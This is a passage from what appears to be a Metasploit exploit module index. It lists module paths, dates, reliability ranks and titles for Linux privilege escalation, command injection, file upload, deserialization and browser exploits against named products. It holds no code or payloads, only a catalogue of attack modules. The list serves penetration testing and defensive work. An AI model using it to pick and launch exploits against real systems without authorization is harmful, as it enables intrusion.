Remote Code Execution - linux/http/symantec_messaging_gateway_exec 2017-04-26 excellent No Symantec Messaging Gateway Remote Code Execution - linux/http/symantec_web_gateway_exec 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection - linux/http/symantec_web_gateway_file_upload 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability - linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability - linux/http/symantec_web_gateway_pbcontrol 2012-07-23 excellent Yes Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection - linux/http/symantec_web_gateway_restore 2014-12-16 excellent Yes Symantec Web Gateway 5 restore.php Post Authentication Command Injection - linux/http/synology_dsm_sliceupload_exec_noauth 2013-10-31 excellent Yes Synology DiskStation Manager SLICEUPLOAD Remote Command Execution - linux/http/tiki_calendar_exec 2016-06-06 excellent Yes Tiki-Wiki CMS Calendar Command Execution - linux/http/tp_link_sc2020n_authenticated_telnet_injection 2015-12-20 excellent No TP-Link SC2020n Authenticated Telnet Injection - linux/http/tr064_ntpserver_cmdinject 2016-11-07 normal Yes Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064 - linux/http/trend_micro_imsva_exec 2017-01-15 excellent No Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution - linux/http/trendmicro_imsva_widget_exec 2017-10-07 excellent Yes Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution - linux/http/trendmicro_sps_exec 2016-08-08 excellent Yes Trend Micro Smart Protection Server Exec Remote Code Injection - linux/http/trueonline_billion_5200w_rce 2016-12-26 excellent No TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection - linux/http/trueonline_p660hn_v1_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection - linux/http/trueonline_p660hn_v2_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection - linux/http/ueb_api_rce 2017-08-08 excellent Yes Unitrends UEB http api remote code execution - linux/http/vap2500_tools_command_exec 2014-11-25 normal Yes Arris VAP2500 tools_command.php Command Execution - linux/http/vcms_upload 2011-11-27 excellent Yes V-CMS PHP File Upload and Execute - linux/http/wanem_exec 2012-08-12 excellent Yes WAN Emulator v2.3 Command Execution - linux/http/wd_mycloud_multiupload_upload 2017-07-29 excellent Yes Western Digital MyCloud multi_uploadify File Upload Vulnerability - linux/http/webcalendar_settings_exec 2012-04-23 excellent Yes WebCalendar 1.2.4 Pre-Auth Remote Code Injection - linux/http/webid_converter 2011-07-05 excellent Yes WeBid converter.php Remote PHP Code Injection - linux/http/wipg1000_cmd_injection 2017-04-20 excellent Yes WePresent WiPG-1000 Command Injection - linux/http/xplico_exec 2017-10-29 excellent Yes Xplico Remote Code Execution - linux/http/zabbix_sqli 2013-09-23 excellent Yes Zabbix 2.0.8 SQL Injection and Remote Code Execution - linux/http/zen_load_balancer_exec 2012-09-14 excellent Yes ZEN Load Balancer Filelog Command Execution - linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution - linux/ids/alienvault_centerd_soap_exec 2014-05-05 excellent Yes AlienVault OSSIM av-centerd Command Injection - linux/ids/snortbopre 2005-10-18 good No Snort Back Orifice Pre-Preprocessor Buffer Overflow - linux/imap/imap_uw_lsub 2000-04-16 good Yes UoW IMAP Server LSUB Buffer Overflow - linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation - linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation - linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation - linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent Yes Apport / ABRT chroot Privilege Escalation - linux/local/asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation - linux/local/autostart_persistence 2006-02-13 excellent No Autostart Desktop Item Persistence - linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege Escalation - linux/local/bpf_priv_esc 2016-05-04 good Yes Linux BPF doubleput UAF Privilege Escalation - linux/local/bpf_sign_extension_priv_esc 2017-11-12 great Yes Linux BPF Sign Extension Local Privilege Escalation - linux/local/cron_persistence 1979-07-01 excellent No Cron Persistence - linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation - linux/local/docker_daemon_privilege_escalation 2016-06-28 excellent Yes Docker Daemon Privilege Escalation - linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation - linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc '$ORIGIN' Expansion Privilege Escalation - linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc 'realpath()' Privilege Escalation - linux/local/hp_smhstart 2013-03-30 normal No HP System Management Homepage Local Privilege Escalation - linux/local/juju_run_agent_priv_esc 2017-04-13 excellent Yes Juju-run Agent Privilege Escalation - linux/local/kloxo_lxsuexec 2012-09-18 excellent No Kloxo Local Privilege Escalation - linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 excellent Yes lastore-daemon D-Bus Privilege Escalation - linux/local/libuser_roothelper_priv_esc 2015-07-24 great Yes Libuser roothelper Privilege Escalation - linux/local/nested_namespace_idmap_limit_priv_esc 2018-11-15 great Yes Linux Nested User Namespace idmap Limit Local Privilege Escalation - linux/local/netfilter_priv_esc_ipv4 2016-06-03 good Yes Linux Kernel 4.6.3 Netfilter Privilege Escalation - linux/local/network_manager_vpnc_username_priv_esc 2018-07-26 excellent Yes Network Manager VPNC Username Privilege Escalation - linux/local/ntfs3g_priv_esc 2017-01-05 good Yes Debian/Ubuntu ntfs-3g Local Privilege Escalation - linux/local/overlayfs_priv_esc 2015-06-16 good Yes Overlayfs Privilege Escalation - linux/local/pkexec 2011-04-01 great Yes Linux PolicyKit Race Condition Privilege Escalation - linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence - linux/local/rds_priv_esc 2010-10-20 great Yes Reliable Datagram Sockets (RDS) Privilege Escalation - linux/local/recvmmsg_priv_esc 2014-02-02 good Yes Linux Kernel recvmmsg Privilege Escalation - linux/local/service_persistence 1983-01-01 excellent No Service Persistence - linux/local/sock_sendpage 2009-08-13 great Yes Linux Kernel Sendpage Local Privilege Escalation - linux/local/sophos_wpa_clear_keys 2013-09-06 excellent Yes Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation - linux/local/udev_netlink 2009-04-16 great No Linux udev Netlink Local Privilege Escalation - linux/local/ueb_bpserverd_privesc 2018-03-14 excellent No Unitrends Enterprise Backup bpserverd Privilege Escalation - linux/local/ufo_privilege_escalation 2017-08-10 good Yes Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation - linux/local/vmware_alsa_config 2017-05-22 excellent Yes VMware Workstation ALSA Config File Local Privilege Escalation - linux/local/vmware_mount 2013-08-22 excellent Yes VMWare Setuid vmware-mount Unsafe popen(3) - linux/local/zpanel_zsudo 2013-06-07 excellent Yes ZPanel zsudo Local Privilege Escalation Exploit - linux/misc/accellion_fta_mpipe2 2011-02-07 excellent No Accellion FTA MPIPE2 Command Execution - linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution - linux/misc/drb_remote_codeexec 2011-03-23 excellent No Distributed Ruby Remote Code Execution - linux/misc/gld_postfix 2005-04-12 good No GLD (Greylisting Daemon) Postfix Buffer Overflow - linux/misc/hid_discoveryd_command_blink_on_unauth_rce 2016-03-28 excellent Yes HID discoveryd command_blink_on Unauthenticated RCE - linux/misc/hikvision_rtsp_bof 2014-11-19 normal No Hikvision DVR RTSP Request Remote Code Execution - linux/misc/hp_data_protector_cmd_exec 2011-02-07 excellent No HP Data Protector 6 EXEC_CMD Remote Code Execution - linux/misc/hp_jetdirect_path_traversal 2017-04-05 normal No HP Jetdirect Path Traversal Arbitrary Code Execution - linux/misc/hp_nnmi_pmd_bof 2014-09-09 normal Yes HP Network Node Manager I PMD Buffer Overflow - linux/misc/hp_vsa_login_bof 2013-06-28 normal Yes HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow - linux/misc/hplip_hpssd_exec 2007-10-04 excellent No HPLIP hpssd.py From Address Arbitrary Command Execution - linux/misc/ib_inet_connect 2007-10-03 good No Borland InterBase INET_connect() Buffer Overflow - linux/misc/ib_jrd8_create_database 2007-10-03 good No Borland InterBase jrd8_create_database() Buffer Overflow - linux/misc/ib_open_marker_file 2007-10-03 good No Borland InterBase open_marker_file() Buffer Overflow - linux/misc/ib_pwd_db_aliased 2007-10-03 good No Borland InterBase PWD_db_aliased() Buffer Overflow - linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability - linux/misc/jenkins_ldap_deserialize 2016-11-16 excellent Yes Jenkins CLI HTTP Java Deserialization Vulnerability - linux/misc/lprng_format_string 2000-09-25 normal No LPRng use_syslog Remote Format String Vulnerability - linux/misc/mongod_native_helper 2013-03-24 normal No MongoDB nativeHelper.apply Remote Code Execution - linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution - linux/misc/netcore_udp_53413_backdoor 2014-08-25 normal Yes Netcore Router Udp 53413 Backdoor - linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow - linux/misc/novell_edirectory_ncp_bof 2012-12-12 normal Yes Novell eDirectory 8 Buffer Overflow - linux/misc/opennms_java_serialize 2015-11-06 normal No OpenNMS Java Object Unserialization Remote Code Execution - linux/misc/qnap_transcode_server 2017-08-06 excellent Yes QNAP Transcode Server Command Execution - linux/misc/quest_pmmasterd_bof 2017-04-09 normal Yes Quest Privilege Manager pmmasterd Buffer Overflow - linux/misc/sercomm_exec 2013-12-31 great Yes SerComm Device Remote Code Execution - linux/misc/ueb9_bpserverd 2017-08-08 excellent Yes Unitrends UEB bpserverd authentication bypass RCE - linux/misc/zabbix_server_exec 2009-09-10 excellent Yes Zabbix Server Arbitrary Command Execution - linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow - linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow - linux/pop3/cyrus_pop3d_popsubfolders 2006-05-21 normal No Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow - linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution - linux/pptp/poptop_negative_read 2003-04-09 great Yes Poptop Negative Read Overflow - linux/proxy/squid_ntlm_authenticate 2004-06-08 great No Squid NTLM Authenticate Overflow - linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) - linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load - linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow - linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow - linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) - linux/smtp/exim4_dovecot_exec 2013-05-03 excellent No Exim and Dovecot Insecure Configuration Command Injection - linux/smtp/exim_gethostbyname_bof 2015-01-27 great Yes Exim GHOST (glibc gethostbyname) Buffer Overflow - linux/smtp/haraka 2017-01-26 excellent Yes Haraka SMTP Command Injection - linux/ssh/ceragon_fibeair_known_privkey 2015-04-01 excellent No Ceragon FibeAir IP-10 SSH Private Key Exposure - linux/ssh/exagrid_known_privkey 2016-04-07 excellent No ExaGrid Known SSH Key and Default Password - linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent No F5 BIG-IP SSH Private Key Exposure - linux/ssh/loadbalancerorg_enterprise_known_privkey 2014-03-17 excellent No Loadbalancer.org Enterprise VA SSH Private Key Exposure - linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec - linux/ssh/quantum_dxi_known_privkey 2014-03-17 excellent No Quantum DXi V1000 SSH Private Key Exposure - linux/ssh/quantum_vmpro_backdoor 2014-03-17 excellent No Quantum vmPRO Backdoor Command - linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWind LEM Default SSH Password Remote Code Execution - linux/ssh/symantec_smg_ssh 2012-08-27 excellent No Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability - linux/ssh/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload - linux/ssh/vmware_vdp_known_privkey 2016-12-20 excellent No VMware VDP Known SSH Key - linux/telnet/netgear_telnetenable 2009-10-30 excellent Yes NETGEAR TelnetEnable - linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow - linux/upnp/dlink_upnp_msearch_exec 2013-02-01 excellent Yes D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection - linux/upnp/miniupnpd_soap_bof 2013-03-27 normal Yes MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution - mainframe/ftp/ftp_jcl_creds 2013-05-12 normal Yes FTP JCL Execution - multi/browser/adobe_flash_hacking_team_uaf 2015-07-06 great No Adobe Flash Player ByteArray Use After Free - multi/browser/adobe_flash_nellymoser_bof 2015-06-23 great No Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow - multi/browser/adobe_flash_net_connection_confusion 2015-03-12 great No Adobe Flash Player NetConnection Type Confusion - multi/browser/adobe_flash_opaque_background_uaf 2015-07-06 great No Adobe Flash opaqueBackground Use After Free - multi/browser/adobe_flash_pixel_bender_bof 2014-04-28 great No Adobe Flash Player Shader Buffer Overflow - multi/browser/adobe_flash_shader_drawing_fill 2015-05-12 great No Adobe Flash Player Drawing Fill Shader Memory Corruption - multi/browser/adobe_flash_shader_job_overflow 2015-05-12 great No Adobe Flash Player ShaderJob Buffer Overflow - multi/browser/adobe_flash_uncompress_zlib_uaf 2014-04-28 great No Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free - multi/browser/firefox_escape_retval 2009-07-13 normal No Firefox 3.5 escape() Return Value Memory Corruption - multi/browser/firefox_pdfjs_privilege_escalation 2015-03-31 manual No Firefox PDF.js Privileged Javascript Injection - multi/browser/firefox_proto_crmfrequest 2013-08-06 excellent No Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution - multi/browser/firefox_proxy_prototype 2014-01-20 manual No Firefox Proxy Prototype Privileged Javascript Injection - multi/browser/firefox_queryinterface 2006-02-02 normal No Firefox location.QueryInterface() Code Execution - multi/browser/firefox_svg_plugin 2013-01-08 excellent No Firefox 17.0.1 Flash Privileged Code Injection - multi/browser/firefox_tostring_console_injection 2013-05-14 excellent No Firefox toString console.time Privileged Javascript Injection - multi/browser/firefox_webidl_injection 2014-03-17 excellent No Firefox WebIDL Privileged Javascript Injection - multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution - multi/browser/itms_overflow 2009-06-01 great No Apple OS X iTunes 8.1.1 ITMS Overflow - multi/browser/java_atomicreferencearray 2012-02-14 excellent No Java AtomicReferenceArray Type Violation Vulnerability - multi/browser/java_calendar_deserialize 2008-12-03 excellent No Sun Java Calendar Deserialization Privilege Escalation - multi/browser/java_getsoundbank_bof 2009-11-04 great No Sun Java JRE getSoundbank file:// URI Buffer Overflow - multi/browser/java_jre17_driver_manager 2013-01-10 excellent No Java Applet Driver Manager Privileged toString() Remote Code Execution - multi/browser/java_jre17_exec 2012-08-26 excellent No Java 7 Applet Remote Code Execution - multi/browser/java_jre17_glassfish_averagerangestatisticimpl 2012-10-16 excellent No Java Applet AverageRangeStatisticImpl Remote Code Execution - multi/browser/java_jre17_jaxws 2012-10-16 excellent No Java Applet JAX-WS Remote Code Execution - multi/browser/java_jre17_jmxbean 2013-01-10 excellent No Java Applet JMX Remote Code Execution - multi/browser/java_jre17_jmxbean_2 2013-01-19 excellent No Java Applet JMX Remote Code Execution - multi/browser/java_jre17_method_handle 2012-10-16 excellent No Java Applet Method Handle Remote Code Execution - multi/browser/java_jre17_provider_skeleton 2013-06-18 great No Java Applet ProviderSkeleton Insecure Invoke Method - multi/browser/java_jre17_reflection_types 2013-01-10 excellent No Java Applet Reflection Type Confusion Remote Code Execution - multi/browser/java_rhino 2011-10-18 excellent No Java Applet Rhino Script Engine Remote Code Execution - multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation - multi/browser/java_setdifficm_bof 2009-11-04 great No Sun Java JRE AWT setDiffICM Buffer Overflow - multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution - multi/browser/java_storeimagearray 2013-08-12 great No Java storeImageArray() Invalid Array Indexing Vulnerability - multi/browser/java_trusted_chain 2010-03-31 excellent No Java Statement.invoke() Trusted Method Chain Privilege Escalation - multi/browser/java_verifier_field_access 2012-06-06 excellent No Java Applet Field Bytecode Verifier Cache Remote Code Execution - multi/browser/mozilla_compareto 2005-07-13 normal No Mozilla Suite/Firefox compareTo() Code Execution - multi/browser/mozilla_navigatorjava 2006-07-25 normal No Mozilla Suite/Firefox Navigator Object Code Execution - multi/browser/msfd_rce_browser 2018-04-11 normal No Metasploit msfd Remote Code Execution via Browser - multi/browser/opera_configoverwrite 2007-03-05 excellent No Opera 9 Configuration Overwrite - multi/browser/opera_historysearch 2008-10-23 excellent No Opera historysearch XSS - multi/browser/qtjava_pointer 2007-04-23 excellent No Apple QTJava toQTPointer() Arbitrary Memory Access - multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution - multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass - multi/fileformat/adobe_u3d_meshcont 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun - multi/fileformat/ghostscript_failed_restore 2018-08-21 excellent No Ghostscript Failed Restore Command Execution - multi/fileformat/js_unpacker_eval_injection 2015-02-18 excellent No Javascript Injection for Eval-based Unpackers - multi/fileformat/maple_maplet 2010-04-26 excellent No Maple Maplet File Creation and Command Execution - multi/fileformat/nodejs_js_yaml_load_code_exec 2013-06-28 excellent No Nodejs js-yaml load() Code Execution - multi/fileformat/office_word_macro 2012-01-10 excellent No Microsoft Office Word Malicious Macro Execution - multi/fileformat/peazip_command_injection 2009-06-05 excellent No PeaZip Zip Processing Command Injection - multi/fileformat/swagger_param_inject 2016-06-23 excellent No JSON Swagger CodeGen Parameter Injector - multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) - multi/ftp/wuftpd_site_exec_format 2000-06-22 great Yes WU-FTPD SITE EXEC/INDEX Format String Vulnerability - multi/gdb/gdb_server_exec 2014-08-24 great No GDB Server Remote Payload Execution - multi/hams/steamed 2018-04-01 manual No Steamed Hams - multi/handler manual No Generic Payload Handler - multi/http/activecollab_chat 2012-05-30 excellent Yes Active Collab "chat module" Remote PHP Code Injection Exploit - multi/http/ajaxplorer_checkinstall_exec 2010-04-04 excellent Yes AjaXplorer checkInstall.php Remote Command Execution - multi/http/apache_activemq_upload_jsp 2016-06-01 excellent No ActiveMQ web shell upload - multi/http/apache_jetspeed_file_upload 2016-03-06 manual No Apache Jetspeed Arbitrary File Upload - multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) - multi/http/apache_roller_ognl_injection 2013-10-31 excellent Yes Apache Roller OGNL Injection - multi/http/apprain_upload_exec 2012-01-19 excellent Yes appRain CMF Arbitrary PHP File Upload Vulnerability - multi/http/atutor_sqli 2016-03-01 excellent Yes ATutor 2.2.1 SQL Injection / Remote Code Execution - multi/http/auxilium_upload_exec 2012-09-14 excellent Yes Auxilium RateMyPet Arbitrary File Upload Vulnerability - multi/http/axis2_deployer 2010-12-30 excellent No Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) - multi/http/bassmaster_js_injection 2016-11-01 excellent Yes Bassmaster Batch Arbitrary JavaScript Injection Remote Code Execution - multi/http/bolt_file_upload 2015-08-17 excellent Yes CMS Bolt File Upload Vulnerability - multi/http/builderengine_upload_exec 2016-09-18 excellent Yes BuilderEngine Arbitrary File Upload Vulnerability and execution - multi/http/caidao_php_backdoor_exec 2015-10-27 excellent Yes China Chopper Caidao PHP Backdoor Code Execution - multi/http/cisco_dcnm_upload 2013-09-18 excellent Yes Cisco Prime Data Center Network Manager Arbitrary File Upload - multi/http/clipbucket_fileupload_exec 2018-03-03 excellent Yes ClipBucket beats_uploader Unauthenticated Arbitrary File Upload - multi/http/cmsms_upload_rename_rce 2018-07-03 excellent Yes CMS Made Simple Authenticated RCE via File Upload/Copy - multi/http/coldfusion_ckeditor_file_upload 2018-09-11 excellent No Adobe ColdFusion CKEditor unrestricted file upload - multi/http/coldfusion_rds 2013-08-08 great Yes Adobe ColdFusion 9 Administrative Login Bypass - multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock) - multi/http/cuteflow_upload_exec 2012-07-27 excellent Yes CuteFlow v2.11.2 Arbitrary File Upload Vulnerability - multi/http/dexter_casinoloader_exec 2014-02-08 excellent Yes Dexter (CasinoLoader) SQL Injection - multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection - multi/http/eaton_nsm_code_exec 2012-06-26 excellent Yes Network Shutdown Module (sort_values) Remote PHP Code Injection - multi/http/eventlog_file_upload 2014-08-31 excellent Yes ManageEngine Eventlog Analyzer Arbitrary File Upload - multi/http/extplorer_upload_exec 2012-12-31 excellent Yes eXtplorer v2.1 Arbitrary File Upload Vulnerability - multi/http/familycms_less_exec 2011-11-29 excellent Yes Family Connections less.php Remote Command Execution - multi/http/freenas_exec_raw 2010-11-06 great No FreeNAS exec_raw.php Arbitrary Command Execution - multi/http/gestioip_exec 2013-10-04 excellent No GestioIP Remote Command Execution - multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390 - multi/http/git_submodule_command_exec 2017-08-10 excellent No Malicious Git HTTP Server For CVE-2017-1000117 - multi/http/git_submodule_url_exec 2018-10-05 excellent No Malicious Git HTTP Server For CVE-2018-17456 - multi/http/gitlab_shell_exec 2013-11-04 excellent Yes Gitlab-shell Code Execution - multi/http/gitlist_arg_injection 2018-04-26 excellent Yes GitList v0.6.0 Argument Injection Vulnerability - multi/http/gitorious_graph 2012-01-19 excellent No Gitorious Arbitrary Command Execution - multi/http/glassfish_deployer 2011-08-04 excellent No Sun/Oracle GlassFish Server Authenticated Code Execution - multi/http/glossword_upload_exec 2013-02-05 excellent Yes Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability - multi/http/glpi_install_rce 2013-09-12 manual Yes GLPI install.php Remote Command Execution - multi/http/horde_href_backdoor 2012-02-13 excellent No Horde 3.3.12 Backdoor Arbitrary PHP Code Execution - multi/http/hp_sitescope_issuesiebelcmd 2013-10-30 great Yes HP SiteScope issueSiebelCmd Remote Code Execution - multi/http/hp_sitescope_uploadfileshandler 2012-08-29 good No HP SiteScope Remote Code Execution - multi/http/hp_sys_mgmt_exec 2013-06-11 excellent Yes HP System Management Homepage JustGetSNMPQueue Command Injection - multi/http/hyperic_hq_script_console 2013-10-10 excellent Yes VMware Hyperic HQ Groovy Script-Console Java Execution - multi/http/ibm_openadmin_tool_soap_welcomeserver_exec 2017-05-30 excellent Yes IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution - multi/http/ispconfig_php_exec 2013-10-30 excellent No ISPConfig Authenticated Arbitrary PHP Code Execution - multi/http/jboss_bshdeployer 2010-04-26 excellent No JBoss JMX Console Beanshell Deployer WAR Upload and Deployment - multi/http/jboss_deploymentfilerepository 2010-04-26 excellent No JBoss Java Class DeploymentFileRepository WAR Deployment - multi/http/jboss_invoke_deploy 2007-02-20 excellent Yes JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) - multi/http/jboss_maindeployer 2007-02-20 excellent No JBoss JMX Console Deployer Upload and Execute - multi/http/jboss_seam_upload_exec 2010-08-05 normal Yes JBoss Seam 2 File Upload and Execute - multi/http/jenkins_script_console 2013-01-18 good Yes Jenkins-CI Script-Console Java Execution - multi/http/jenkins_xstream_deserialize 2016-02-24 excellent Yes Jenkins XStream Groovy classpath Deserialization Vulnerability - multi/http/jira_hipchat_template 2015-10-28 excellent Yes Atlassian HipChat for Jira Plugin Velocity Template Injection - multi/http/jira_plugin_upload 2018-02-22 excellent Yes Atlassian Jira Authenticated Upload Code Execution - multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution - multi/http/kordil_edms_upload_exec 2013-02-22 excellent Yes Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability - multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution - multi/http/log1cms_ajax_create_folder 2011-04-11 excellent Yes Log1 CMS writeInfo() PHP Code Injection - multi/http/magento_unserialize 2016-05-17 excellent Yes Magento 2.0.6 Unserialize Remote Code Execution - multi/http/makoserver_cmd_exec 2017-09-03 excellent Yes Mako Server v2.5, 2.6 OS Command Injection RCE - multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection - multi/http/manageengine_auth_upload 2014-12-15 excellent Yes ManageEngine Multiple Products Authenticated File Upload - multi/http/manageengine_sd_uploader 2015-08-20 excellent Yes ManageEngine ServiceDesk Plus Arbitrary File Upload - multi/http/manageengine_search_sqli 2012-10-18 excellent Yes ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection - multi/http/mantisbt_manage_proj_page_rce 2008-10-16 excellent Yes Mantis manage_proj_page PHP Code Execution - multi/http/mantisbt_php_exec 2014-11-08 great Yes MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability - multi/http/mediawiki_syntaxhighlight 2017-04-06 good Yes MediaWiki SyntaxHighlight extension option injection vulnerability - multi/http/mediawiki_thumb 2014-01-28 excellent Yes MediaWiki Thumb.php Remote Command Execution - multi/http/metasploit_static_secret_key_base 2016-09-15 excellent Yes Metasploit Web UI Static secret_key_base Value - multi/http/metasploit_webui_console_command_execution 2016-08-23 excellent No Metasploit Web UI Diagnostic Console Command Execution - multi/http/mma_backdoor_upload 2012-04-02 excellent Yes Th3 MMA mma.php Backdoor Arbitrary File Upload - multi/http/mobilecartly_upload_exec 2012-08-10 excellent Yes MobileCartly 1.0 Arbitrary File Creation Vulnerability - multi/http/monstra_fileupload_exec 2017-12-18 excellent Yes Monstra CMS Authenticated Arbitrary File Upload - multi/http/moodle_cmd_exec 2013-10-30 good No Moodle Remote Command Execution - multi/http/movabletype_upgrade_exec 2013-01-07 excellent Yes Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution - multi/http/mutiny_subnetmask_exec 2012-10-22 excellent Yes Mutiny Remote Command Execution - multi/http/nas4free_php_exec 2013-10-30 great No NAS4Free Arbitrary Remote Code Execution - multi/http/navigate_cms_rce 2018-09-26 excellent Yes Navigate CMS Unauthenticated Remote Code Execution - multi/http/netwin_surgeftp_exec 2012-12-06 good Yes Netwin SurgeFTP Remote Command Execution - multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability - multi/http/novell_servicedesk_rce 2016-03-30 excellent Yes Novell ServiceDesk Authenticated File Upload - multi/http/op5_license 2012-01-05 excellent Yes OP5 license.php Remote Command Execution - multi/http/op5_welcome 2012-01-05 excellent Yes OP5 welcome Remote Command Execution - multi/http/openfire_auth_bypass 2008-11-10 excellent Yes Openfire Admin Console Authentication Bypass - multi/http/openmediavault_cmd_exec 2013-10-30 excellent No OpenMediaVault Cron Remote Command Execution - multi/http/openx_backdoor_php 2013-08-07 excellent Yes OpenX Backdoor PHP Code Execution - multi/http/opmanager_socialit_file_upload 2014-09-27 excellent Yes ManageEngine OpManager and Social IT Arbitrary File Upload - multi/http/oracle_ats_file_upload 2016-01-20 excellent Yes Oracle ATS Arbitrary File Upload - multi/http/oracle_reports_rce 2014-01-15 great Yes Oracle Forms and Reports Remote Code Execution - multi/http/oracle_weblogic_wsat_deserialization_rce 2017-10-19 excellent No Oracle WebLogic wls-wsat Component Deserialization RCE - multi/http/orientdb_exec 2017-07-13 good Yes OrientDB 2.2.x Remote Code Execution - multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution - multi/http/pandora_upload_exec 2010-11-30 excellent Yes Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability - multi/http/phoenix_exec 2016-07-01 excellent Yes Phoenix Exploit Kit Remote Code Execution - multi/http/php_cgi_arg_injection 2012-05-03 excellent Yes PHP CGI Argument Injection - multi/http/php_utility_belt_rce 2015-12-08 excellent Yes PHP Utility Belt Remote Code Execution - multi/http/php_volunteer_upload_exec 2012-05-28 excellent No PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability - multi/http/phpfilemanager_rce 2015-08-28 excellent Yes 